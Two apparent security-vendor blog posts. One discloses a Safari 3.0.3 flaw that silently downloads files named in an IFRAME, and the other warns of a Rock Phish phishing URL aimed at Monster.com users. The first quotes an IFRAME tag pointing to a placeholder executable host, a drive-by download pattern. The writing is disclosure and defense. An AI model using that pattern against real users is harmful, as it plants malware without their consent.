A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.

True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,

iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”

Unlike IE and Firefox, which displays an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.

A behind the scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.

The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.

Additional information provided by Leander Yu.

It’s another game of chance for Monster.com users: TrendLabs has just discovered a suspiciously-constructed URL that is possibly involved in a phishing attack against the said popular job-hunting site:

• http://{BLOCKED}-id874926.monster.com.kkkmode.cn/membersdir/employer_form/mydata.aspx

Initial analysis from Joey Costoya of the Trend Micro Incident Response Team (TMIRT), indicates that the said link was created using Rock Phish, a well-known phishing toolkit that makes it possible for relatively nontechnical people to create and carry out phishing attempts.

Below is a screenshot of the said phishing page:

It seems the attacks against Monster.com are not over yet. Readers may recall the malware targeting users of the said site in this post. Thus, users, especially those who have accounts at Monster.com, should exercise caution when clicking on links found in unsolicited email. Monster.com’s Security Center has also posted a notice about avoiding online fraud.